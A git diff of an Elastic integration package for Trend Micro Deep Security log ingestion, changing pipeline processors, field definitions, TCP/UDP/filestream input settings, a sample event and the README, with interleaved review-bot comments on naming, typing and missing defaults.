@@ -2,79 +2,29 @@ description: Pipeline for Web Reuptation processors: - set: - field: trendmicro.event.category - value: "web-reputation" - - set: + field: trendmicro.deep_security.event_category + tag: set_deep_security_event_category + value: web-reputation-event + - append: field: event.category - value: [network] + tag: set_event_category + value: network + allow_duplicates: false - append: field: event.type + tag: set_event_type value: info allow_duplicates: false - if: ctx.trendmicro?.event?.signature_id != null && ctx.trendmicro.event.signature_id == '5000000' - append: field: event.type + tag: set_event_type value: denied allow_duplicates: false - if: ctx.trendmicro?.event?.signature_id != null && ctx.trendmicro.event.signature_id == '5000001' - - - script: - lang: painless - params: - extensions: - # Rename field - - name: deviceCustomNumber1 - to: host.id - - name: deviceAddress - to: host.ip - - name: deviceHostName - to: host.hostname - - name: TrendMicroDsTags - to: trendmicro.event.tags - - name: TrendMicroDsTenantId - to: trendmicro.event.tenant_id - - name: TrendMicroDsTenant - to: trendmicro.event.tenant_name - source: | - def actions = new ArrayList(); - def exts = ctx.cef?.extensions; - if (exts == null) return; - for (entry in params.extensions) { - def value = exts[entry.name]; - if (value == null || - (entry.convert != null && - (value=entry.convert[value.toLowerCase()]) == null)) - continue; - if (entry.to != null) { - actions.add([ - "value": value, - "to": entry.to - ]); - continue; - } - def label = exts[entry.name + "Label"]; - if (label == null) continue; - def dest = entry.labels[label.toLowerCase()]; - if (dest == null) continue; - actions.add([ - "value": value, - "to": dest - ]); - } - ctx["_tmp_copy"] = actions; - - foreach: - field: _tmp_copy - processor: - set: - field: "{{_ingest._value.to}}" - value: "{{_ingest._value.value}}" - - remove: - field: - - _tmp_copy + if: ctx.trendmicro?.deep_security?.signature_id != null && 
ctx.trendmicro.deep_security.signature_id == 5000001
 on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
 - set:
 field: event.kind
 value: pipeline_error
- - append:
- field: error.message
- value: '{{{ _ingest.on_failure_message }}}'
diff --git a/packages/trendmicro/data_stream/deep_security/fields/base-fields.yml b/packages/trendmicro/data_stream/deep_security/fields/base-fields.yml
index 7c798f4534c..ef5a78420f8 100644
--- a/packages/trendmicro/data_stream/deep_security/fields/base-fields.yml
+++ b/packages/trendmicro/data_stream/deep_security/fields/base-fields.yml
@@ -7,6 +7,17 @@
 - name: data_stream.namespace
 type: constant_keyword
 description: Data stream namespace.
+- name: event.module
+ type: constant_keyword
+ description: Event module.
+ value: trendmicro
+- name: event.dataset
+ type: constant_keyword
+ description: Event dataset.
+ value: trendmicro.deep_security
+- name: log.source.address
+ description: Source address from which the log event was read / sent from.
+ type: keyword
 - name: '@timestamp'
 type: date
 description: Event timestamp.
diff --git a/packages/trendmicro/data_stream/deep_security/fields/beats.yml b/packages/trendmicro/data_stream/deep_security/fields/beats.yml
new file mode 100644
index 00000000000..9eff736e678
--- /dev/null
+++ b/packages/trendmicro/data_stream/deep_security/fields/beats.yml
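Review bot: Both `event.type` appends carry the same `tag: set_event_type`, so the new on_failure message (`with tag {{{_ingest.on_failure_processor_tag}}}`) cannot tell which of the two failed; `tag: append_event_type_info` and `tag: append_event_type_denied` would disambiguate. The `if:` that guarded the `info` append on signature id 5000000 was removed without a replacement, so `info` is now appended to every web-reputation event, including those that also receive `denied` for 5000001; if that is deliberate, a one-line comment saying so would stop it being read as an accidental loss while the `denied` condition was retyped from `'5000001'` to the long `5000001`. The unchanged `description: Pipeline for Web Reuptation` context line still carries the typo (`Reputation`).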
@@ -0,0 +1,30 @@
+- name: input.type
+ type: keyword
+ description: Type of filebeat input.
+- name: log.offset
+ type: long
+ description: Log offset.
+- name: log.file
+ type: group
+ fields:
+ - name: device_id
+ type: keyword
+ description: ID of the device containing the filesystem where the file resides.
+ - name: fingerprint
+ type: keyword
+ description: The sha256 fingerprint identity of the file when fingerprinting is enabled.
+ - name: inode
+ type: keyword
+ description: Inode number of the log file.
+ - name: idxhi
+ type: keyword
+ description: The high-order part of a unique identifier that is associated with a file. (Windows-only)
+ - name: idxlo
+ type: keyword
+ description: The low-order part of a unique identifier that is associated with a file. (Windows-only)
+ - name: vol
+ type: keyword
+ description: The serial number of the volume that contains a file. (Windows-only)
+- name: tags
+ type: keyword
+ description: User defined tags.
diff --git a/packages/trendmicro/data_stream/deep_security/fields/fields.yml b/packages/trendmicro/data_stream/deep_security/fields/fields.yml
index 7be00f90dde..692a48e3b70 100644
--- a/packages/trendmicro/data_stream/deep_security/fields/fields.yml
+++ b/packages/trendmicro/data_stream/deep_security/fields/fields.yml
@@ -1,90 +1,315 @@ -- name: trendmicro.event +- name: source.process.name + type: keyword + description: Source process name. +- name: trendmicro type: group fields: - - name: action_reason - type: keyword - description: The reason why application control performed the specified action, such as "notWhitelisted" (the software did not have a matching rule, and application control was configured to block unrecognized software). - - name: tags - type: keyword - description: Deep Security event tags assigned to the event. - - name: tenant_id - type: keyword - description: Deep Security tenant ID. - - name: tenant_name - type: keyword - description: Deep Security tenant name. - - name: aggregation_type - type: keyword - description: An integer that indicates how the event is aggregated. - - name: count - type: keyword - description: The number of occurrences of the event. - - name: tcp_flag - type: keyword - description: TCP Flag. - - name: packet_fragmentation - type: keyword - description: Packet Fragmentation Information. - - name: ethernet_frame_type - type: keyword - description: Connection ethernet frame type. - - name: packet_data - type: keyword - description: The packet data, represented in Base64. - - name: old_file_path - type: keyword - description: The previous integrity rule target entity to capture the rename action from the previous target entity to the new, which is recorded in the filePath field. - - name: ips_stream_position - type: keyword - description: Position within stream of data that triggered the event. - - name: ips_packet_position - type: keyword - description: Position within packet of data that triggered the event. - - name: ips_flag - type: keyword - description: A combined value that includes the sum of the flag values. - - name: log_inspection_description - type: keyword - description: The Log Inspection sub-rule which triggered this event. 
- - name: threat_type - type: keyword - description: The type of system resource that this malware was trying to affect, such as the file system, a process, or Windows registry. - - name: malware_target - type: keyword - description: The file, process, or registry key (if any) that the malware was trying to affect. If the malware was trying to affect more than one, this field will contain the value "Multiple." - - name: malware_target_type - type: keyword - description: The type of system resource that this malware was trying to affect, such as the file system, a process, or Windows registry. - - name: threat_probability - type: keyword - description: Indicates how closely (in %) the file matched the malware model. - - name: spyware_risklevel - type: keyword - description: Risk level values. - - name: spyware_resourcetype - type: keyword - description: Resource Type values.For example, if there's a spyware file named spy.exe that creates a registry run key to keep its persistence after system reboot, there will be two items in the spyware report; the item for spy.exe has Files and Directories, and the item for the run key registry has System Registry. - - name: target - type: keyword - description: The subject of the event. It can be the administrator account logged into Deep Security Manager, or a computer. - - name: target_id - type: keyword - description: The identifier added in the manager. - - name: target_type - type: keyword - description: The event target entity type. - - name: message - type: keyword - description: The event short message. - - name: name - type: keyword - description: Name of the event type. - - name: probable_threat_type - type: keyword - description: Probable Threat Type.Indicates the most likely type of threat contained in the file after Predictive Machine Learning compared the analysis to other known threats(separate by semicolon";" ). - - name: category - type: keyword - description: proper categorization of some events. 
- - name: signature_id - type: integer - description: The "Signature ID" value indicates what kind of event has been triggered. + - name: deep_security + type: group + fields: + - name: action + type: keyword + description: The action detected by the integrity rule. + - name: aggregation_type + type: keyword + description: An integer that indicates how the event is aggregated:. + - name: base_event_count + type: long + description: Base event count. + - name: bytes_in + type: long + description: Number of inbound bytes read. + - name: computer_name + type: keyword + description: The computer name. + - name: destination + type: group + fields: + - name: address + type: ip + description: IP address of the destination computer. + - name: mac_address + type: keyword + description: Destination MAC Address. + - name: port + type: long + description: Port number of the destination computer's connection or session. + - name: user_name + type: keyword + description: Destination user name. + - name: device + type: group + fields: + - name: custom_number1 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cn1. + - name: value + type: keyword + description: The value for the field cn1. + - name: custom_number2 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cn2. + - name: value + type: long + description: The value for the field cn2. + - name: custom_number3 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cn3. + - name: value + type: long + description: The value for the field cn3. + - name: custom_string1 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cs1. + - name: value + type: keyword + description: The value for the field cs1. + - name: custom_string2 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cs2. 
+ - name: value + type: keyword + description: The value for the field cs2. + - name: custom_string3 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cs3. + - name: value + type: keyword + description: The value for the field cs3. + - name: custom_string4 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cs4. + - name: value + type: keyword + description: The value for the field cs4. + - name: custom_string5 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cs5. + - name: value + type: keyword + description: The value for the field cs5. + - name: custom_string6 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cs6. + - name: value + type: keyword + description: The value for the field cs6. + - name: custom_string7 + type: group + fields: + - name: label + type: keyword + description: The name label for the field cs7. + - name: value + type: keyword + description: The value for the field cs7. + - name: product + type: keyword + description: Product name. + - name: vendor + type: keyword + description: Vendor name. + - name: version + type: keyword + description: Product version. + - name: deviceHostName + type: keyword + description: The hostname for cn1. + - name: domain_name + type: keyword + description: The domain name. + - name: event_category + type: keyword + description: Event category of deep security event. + - name: event_class_id + type: keyword + description: Event Class ID. + - name: file + type: group + fields: + - name: hash + type: keyword + description: The SHA 256 hash that identifies the software file. + - name: size + type: long + description: The file size in bytes. + - name: file_path + type: keyword + description: The location of the malware file. + - name: filename + type: keyword + description: The file name that was accessed. 
+ - name: message + type: keyword + description: A list of changed attribute names. + - name: model + type: keyword + description: The product name of the device. + - name: name + type: keyword + description: CEF event containing message. + - name: permission + type: keyword + description: The block reason of the access. + - name: process + type: group + fields: + - name: name + type: keyword + description: The process name. + - name: repeat_count + type: keyword + description: The number of occurrences of the event. + - name: request_url + type: keyword + description: The URL of the request. + - name: result + type: keyword + description: The result of the failed Anti-Malware action. + - name: serial + type: keyword + description: The serial number of the device. + - name: severity + type: long + description: Severity of the Event. + - name: signature_id + type: long + description: Signature ID of event. + - name: source + type: group + fields: + - name: address + type: ip + description: Source computer IP address. + - name: host_name + type: keyword + description: Source computer hostname. + - name: mac_address + type: keyword + description: MAC address of the source computer's network interface. + - name: port + type: long + description: Port number of the source computer's connection or session. + - name: process_name + type: keyword + description: The name of the event's source process. + - name: user_id + type: keyword + description: Source user ID. + - name: user_name + type: keyword + description: Account of the user who changed the file being monitored. + - name: target + type: group + fields: + - name: id + type: keyword + description: The identifier added in the manager. + - name: value + type: keyword + description: The subject of the event. It can be the administrator account logged into Deep Security Manager, or a computer. + - name: transport_protocol + type: keyword + description: Name of the transport protocol used. 
+ - name: trendmicro + type: group + fields: + - name: ds_behavior + type: group + fields: + - name: rule_id + type: keyword + description: The behavior monitoring rule ID for internal malware case tracking. + - name: type + type: keyword + description: The type of behavior monitoring event detected. + - name: ds_command_line + type: keyword + description: The commands that the subject process executes. + - name: ds_cve + type: keyword + description: The CVE information, if the process behavior is identified in one of Common Vulnerabilities and Exposures. + - name: ds_detection_confidence + type: long + description: Indicates how closely the file matched the malware model. + - name: ds_file + type: group + fields: + - name: md5 + type: keyword + description: The MD5 hash of the file. + - name: sha1 + type: keyword + description: The SHA1 hash of the file. + - name: sha256 + type: keyword + description: The SHA256 hash of the file. + - name: ds_frame_type + type: keyword + description: Connection ethernet frame type. + - name: ds_malware_target + type: group + fields: + - name: count + type: long + description: The number of target files. + - name: type + type: keyword + description: The type of system resource that this malware was trying to affect. + - name: value + type: keyword + description: The file, process, or registry key (if any) that the malware was trying to affect. + - name: ds_mitre + type: keyword + description: The MITRE information, if the process behavior is identified in one of MITRE attack scenarios. + - name: ds_packet_data + type: keyword + description: The packet data, represented in Base64. + - name: ds_process + type: keyword + description: Name of ds process. + - name: ds_relevant_detection_names + type: keyword + description: Probable Threat Type. + - name: ds_tenant + type: keyword + description: Deep Security tenant. + - name: ds_tenant_id + type: keyword + description: Deep Security tenant ID. 
+ - name: type + type: keyword + description: The device type of the device. + - name: version + type: keyword + description: Deep Security version. + - name: xff + type: ip + description: The IP address of the last hub in the X-Forwarded-For header. diff --git a/packages/trendmicro/data_stream/deep_security/manifest.yml b/packages/trendmicro/data_stream/deep_security/manifest.yml index f5574e12641..b30baf06637 100644 --- a/packages/trendmicro/data_stream/deep_security/manifest.yml +++ b/packages/trendmicro/data_stream/deep_security/manifest.yml 
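Review bot: `deviceHostName` under `trendmicro.deep_security` is the only camelCase name in a tree that is otherwise snake_case (`computer_name`, `domain_name`, `source.host_name`), and its description `The hostname for cn1` does not say what it actually holds; `- name: device_host_name` with a description naming the source key it is copied from would fit the rest of the file (check the pipeline's rename before relying on any guess). Numeric fields are typed inconsistently: `device.custom_number1.value` is `keyword` while `custom_number2.value` and `custom_number3.value` are `long`, and `repeat_count` is `keyword` while `base_event_count` is `long`; if cn1 or the repeat count can legitimately carry non-numeric text, the description should say so, otherwise `type: long` keeps range queries and aggregations working. The `aggregation_type` description ends in `aggregated:.`, a leftover from the removed enumeration.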
@@ -1,41 +1,100 @@ -title: "Trendmicro Deep Security logs" +title: Collect logs from Trend Micro Deep Security type: logs streams: - - input: filestream - template_path: stream.yml.hbs - title: Trendmicro Deep Security logs - description: Collect Deep Security logs + - input: tcp + enabled: false + template_path: tcp.yml.hbs + title: Trend Micro Deep Security logs + description: Collect Trend Micro Deep Security logs via TCP input. vars: - - name: paths + - name: listen_address type: text - title: Paths - multi: true + title: Listen Address + description: The bind address to listen for TCP connections. Set to `0.0.0.0` to bind to all available interfaces. + multi: false required: true show_user: true - default: - - /var/log/trendmicro.log - - name: decode_trendmicro_timezone + default: localhost + - name: listen_port + type: integer + title: Listen Port + description: The TCP port number to listen on. + multi: false + required: true + show_user: true + default: 9510 + - name: tz_offset type: text - title: Trendmicro Timezone + title: Timezone Offset + multi: false + required: false + show_user: true + description: |- + When interpreting syslog timestamps without a time zone, use this timezone offset. + Datetimes recorded in logs are by default interpreted in relation to the timezone set up on the host where the agent is operating. + Use this parameter to adjust the timezone offset when importing logs from a host in a different timezone so that datetimes are appropriately interpreted. + Both a canonical ID (such as "Europe/Amsterdam") and an HH:mm differential (such as "-05:00") are acceptable timezone formats. + - name: tcp_options + type: yaml + title: Custom TCP Options + multi: false + required: false + show_user: false + default: | + #max_message_size: 50KiB + #max_connections: 1 + description: Specify custom configuration options for the TCP input. + - name: ssl + type: yaml + title: SSL Configuration + description: i.e. 
certificate_authorities, supported_protocols, verification_mode etc. multi: false required: false show_user: false - description: IANA time zone or time offset (e.g. `+0200`) to use when interpreting timestamps without a time zone in the CEF message. + default: | + #certificate_authorities: + # - | + # -----BEGIN CERTIFICATE----- + # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF + # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 + # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB + # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n + # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl + # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t + # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP + # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 + # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O + # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux + # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D + # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw + # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA + # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu + # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 + # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk + # sxSmbIUfc2SGJGCJD4I= + # -----END CERTIFICATE----- - name: tags type: text title: Tags - description: A list of tags to include in events. Including `forwarded` indicates that the events did not originate on this host and causes `host.name` to not be added to events. 
multi: true required: true show_user: false default: - - deep-security - forwarded + - trendmicro.deep_security - name: preserve_original_event required: true show_user: true title: Preserve original event - description: Preserves a raw copy of the original event, added to the field `event.original` + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve trendmicro.deep_security fields that were copied to Elastic Common Schema (ECS) fields. type: bool multi: false default: false 
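Review bot: The `tags` variable loses its description in this hunk and likewise in the UDP and filestream hunks below (`@@ -45,48 +104,75 @@` and `@@ -96,50 +182,55 @@`), while `forwarded` remains in the default; that sentence was what told operators the tag suppresses `host.name`. Restore `description: A list of tags to include in events. Including \`forwarded\` indicates that the events did not originate on this host and causes \`host.name\` to not be added to events.` on each of the three inputs. In the new `ssl` variable, `description: i.e. certificate_authorities, supported_protocols, verification_mode etc.` should read `e.g.`, since those are examples rather than the complete list, and the trailing `etc.` makes that intent clear.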
@@ -45,48 +104,75 @@ streams: multi: false required: false show_user: false - description: Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + description: |- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. + This executes in the agent before the logs are parsed. + See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. - input: udp + enabled: false template_path: udp.yml.hbs - title: Trendmicro Deep Security logs - description: Collect Deep Security logs using udp input + title: Trend Micro Deep Security logs + description: Collect Trend Micro Deep Security logs via UDP input. vars: - - name: udp_host + - name: listen_address type: text - title: UDP host to listen on + title: Listen Address + description: The bind address to listen for UDP connections. Set to `0.0.0.0` to bind to all available interfaces. multi: false required: true show_user: true default: localhost - - name: udp_port + - name: listen_port type: integer - title: UDP port to listen on + title: Listen Port + description: The UDP port number to listen on. multi: false required: true show_user: true - default: 9003 - - name: decode_trendmicro_timezone + default: 9510 + - name: tz_offset type: text - title: Trendmicro Timezone + title: Timezone Offset + multi: false + required: false + show_user: true + description: |- + When interpreting syslog timestamps without a time zone, use this timezone offset. + Datetimes recorded in logs are by default interpreted in relation to the timezone set up on the host where the agent is operating. 
+ Use this parameter to adjust the timezone offset when importing logs from a host in a different timezone so that datetimes are appropriately interpreted. + Both a canonical ID (such as "Europe/Amsterdam") and an HH:mm differential (such as "-05:00") are acceptable timezone formats. + - name: udp_options + type: yaml + title: Custom UDP Options multi: false required: false show_user: false - description: IANA time zone or time offset (e.g. `+0200`) to use when interpreting timestamps without a time zone in the CEF message. + default: | + #max_message_size: 50KiB + #timeout: 300s + description: Specify custom configuration options for the UDP input. - name: tags type: text title: Tags - description: A list of tags to include in events. Including `forwarded` indicates that the events did not originate on this host and causes `host.name` to not be added to events. multi: true required: true show_user: false default: - - deep-security - forwarded + - trendmicro.deep_security - name: preserve_original_event required: true show_user: true title: Preserve original event - description: Preserves a raw copy of the original event, added to the field `event.original` + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve trendmicro.deep_security fields that were copied to Elastic Common Schema (ECS) fields. type: bool multi: false default: false 
@@ -96,50 +182,55 @@ streams: multi: false required: false show_user: false - description: >- - Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. - - input: tcp - template_path: tcp.yml.hbs - title: Trendmicro Deep Security logs - description: Collect Deep Security logs using udp input + description: |- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. + This executes in the agent before the logs are parsed. + See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - input: filestream + enabled: false + template_path: filestream.yml.hbs + title: Trend Micro Deep Security logs + description: Collect Trend Micro Deep Security logs via Filestream input. vars: - - name: tcp_host + - name: paths type: text - title: TCP host to listen on - multi: false - required: true - show_user: true - default: localhost - - name: tcp_port - type: integer - title: Syslog Port - description: TCP port to listen on - multi: false + title: Paths + multi: true required: true show_user: true - default: 9003 - - name: decode_trendmicro_timezone + description: A list of glob-based paths that will be crawled and fetched. + - name: tz_offset type: text - title: Trendmicro Timezone + title: Timezone Offset multi: false required: false - show_user: false - description: IANA time zone or time offset (e.g. `+0200`) to use when interpreting timestamps without a time zone in the CEF message. + show_user: true + description: |- + When interpreting syslog timestamps without a time zone, use this timezone offset. Datetimes recorded in logs are by default interpreted in relation to the timezone set up on the host where the agent is operating. 
+ Use this parameter to adjust the timezone offset when importing logs from a host in a different timezone so that datetimes are appropriately interpreted. + Both a canonical ID (such as "Europe/Amsterdam") and an HH:mm differential (such as "-05:00") are acceptable timezone formats. - name: tags type: text title: Tags - description: A list of tags to include in events. Including `forwarded` indicates that the events did not originate on this host and causes `host.name` to not be added to events. multi: true required: true show_user: false default: - - deep-security - forwarded + - trendmicro.deep_security - name: preserve_original_event required: true show_user: true title: Preserve original event - description: Preserves a raw copy of the original event, added to the field `event.original` + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false + - name: preserve_duplicate_custom_fields + required: true + show_user: false + title: Preserve duplicate custom fields + description: Preserve trendmicro.deep_security fields that were copied to Elastic Common Schema (ECS) fields. type: bool multi: false default: false 
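Review bot: The filestream `paths` variable is `required: true` but has no `default:`; the old filestream input removed in the first manifest hunk shipped `default: - /var/log/trendmicro.log`, and that value was not carried over, so a policy using this input cannot be saved until the user types a path. If the old location is still representative, keep `default:` followed by `- /var/log/trendmicro.log`; if leaving it blank is deliberate, a short comment on the variable would record that. The `tz_offset` description on this input speaks of `syslog timestamps`, wording inherited from the TCP/UDP blocks; whether file-collected events carry syslog headers is not visible here, so confirm it matches what `filestream.yml.hbs` parses.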
@@ -149,34 +240,7 @@ streams: multi: false required: false show_user: false - description: >- - Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. - - name: ssl - type: yaml - title: SSL Configuration - description: i.e. certificate_authorities, supported_protocols, verification_mode etc. - multi: false - required: false - show_user: false - default: | - #certificate_authorities: - # - | - # -----BEGIN CERTIFICATE----- - # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF - # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 - # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB - # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n - # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl - # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t - # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP - # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 - # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O - # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux - # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D - # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw - # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA - # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu - # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 - # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk - # sxSmbIUfc2SGJGCJD4I= - # -----END CERTIFICATE----- + description: |- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. 
+ This executes in the agent before the logs are parsed.
+ See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
diff --git a/packages/trendmicro/data_stream/deep_security/sample_event.json b/packages/trendmicro/data_stream/deep_security/sample_event.json
index c3202439a0d..4190ede3dd5 100644
--- a/packages/trendmicro/data_stream/deep_security/sample_event.json
+++ b/packages/trendmicro/data_stream/deep_security/sample_event.json
@@ -1,8 +1,8 @@
 {
 "@timestamp": "2020-09-21T07:21:11.000Z",
 "agent": {
- "ephemeral_id": "846f342d-d7ee-4e2c-862b-08da1c5b6631",
- "id": "a4393c91-c8ae-478b-a4f1-fa6bc37aad87",
+ "ephemeral_id": "2ea89e49-a391-4415-a8c4-c0ad743e691b",
+ "id": "e87ecfdf-7336-4275-96c5-a4ab24a8facc",
 "name": "docker-fleet-agent",
 "type": "filebeat",
 "version": "8.11.0"
@@ -16,7 +16,7 @@
 "version": "8.11.0"
 },
 "elastic_agent": {
- "id": "a4393c91-c8ae-478b-a4f1-fa6bc37aad87",
+ "id": "e87ecfdf-7336-4275-96c5-a4ab24a8facc",
 "snapshot": false,
 "version": "8.11.0"
 },
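Review bot: The removed `ssl` variable was the only place to configure TLS (certificate_authorities, supported_protocols, verification_mode) for the former TCP syslog input, and the previous hunk replaces that input with a filestream input, so it is not visible here whether a TCP listener with TLS still exists in the manifest. If a TCP input remains without an `ssl` variable, CEF events carrying hostnames, file paths and user names would be received in cleartext and the listener could not verify the forwarder, a regression for a security log source; in that case restore the variable on the TCP stream, `- name: ssl`, `type: yaml`, `title: SSL Configuration`, with a description naming the accepted keys instead of the long inline certificate sample. If TCP syslog is intentionally dropped, say so in the package changelog. The enclosing stream definition starts outside the hunk.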
@@ -27,46 +27,56 @@
 ],
 "code": "5000000",
 "dataset": "trendmicro.deep_security",
- "ingested": "2023-12-08T20:46:55Z",
+ "ingested": "2024-03-20T09:48:02Z",
+ "kind": "event",
+ "original": "194 <86>2020-09-21T13:51:11+06:30 DeepSec Logs CEF:0|Trend Micro|Deep Security Agent|10.2.229|5000000|WebReputation|5|cn1=1 cn1Label=Host ID dvchost=hostname request=example.com msg=Blocked By Admin",
 "severity": 5,
+ "timezone": "UTC",
 "type": [
- "denied"
+ "info"
 ]
 },
 "host": {
- "hostname": "hostname",
 "id": "1"
 },
 "input": {
- "type": "filestream"
+ "type": "udp"
 },
 "log": {
- "file": {
- "device_id": "113",
- "inode": "100938580",
- "path": "/tmp/service_logs/trendmicro.log"
+ "source": {
+ "address": "192.168.224.7:54066"
 },
- "offset": 20358,
 "syslog": {
 "priority": 86
 }
 },
+ "message": "Blocked By Admin",
 "observer": {
 "hostname": "hostname",
 "product": "Deep Security Agent",
 "vendor": "Trend Micro",
 "version": "10.2.229"
 },
+ "related": {
+ "hosts": [
+ "1"
+ ]
+ },
 "tags": [
- "deep-security",
- "forwarded"
+ "preserve_original_event",
+ "forwarded",
+ "trendmicro.deep_security"
 ],
 "trendmicro": {
- "event": {
- "category": "web-reputation",
- "message": "Blocked By Admin",
- "name": "WebReputation",
- "signature_id": 5000000
+ "deep_security": {
+ "device": {
+ "custom_number1": {
+ "label": "Host ID"
+ }
+ },
+ "event_category": "web-reputation-event",
+ "signature_id": 5000000,
+ "version": "0"
 }
 },
 "url": {
diff --git a/packages/trendmicro/docs/README.md b/packages/trendmicro/docs/README.md
index 46d7d7ced41..f3744df5c9a 100644
--- a/packages/trendmicro/docs/README.md
+++ b/packages/trendmicro/docs/README.md
@@ -2,15 +2,50 @@ ## Overview -Trend Micro Deep Security provides advanced server security for physical, virtual, and cloud servers. It protects enterprise applications and data from breaches and business disruptions without requiring emergency patching. The Trend Micro Deep Security integration collects and parses data received from [Deep Security](https://www.trendmicro.com/en_gb/business/products/hybrid-cloud/deep-security.html) via a log file. +Trend Micro Deep Security provides advanced server security for physical, virtual, and cloud servers. It protects enterprise applications and data from breaches and business disruptions without requiring emergency patching. The Trend Micro Deep Security integration collects and parses data received from [Deep Security](https://www.trendmicro.com/en_gb/business/products/hybrid-cloud/deep-security.html) via syslog server. ## Data Streams -This integration collects **deep_security** data streams.See more details from Deep Security logging documentation [here](https://help.deepsecurity.trendmicro.com/aws/events.html). +This integration supports **deep_security** data stream. See more details from Deep Security logging documentation [here](https://help.deepsecurity.trendmicro.com/20_0/on-premise/events.html). ## Requirements -Elastic Agent is required to ingest data from Deep Security log 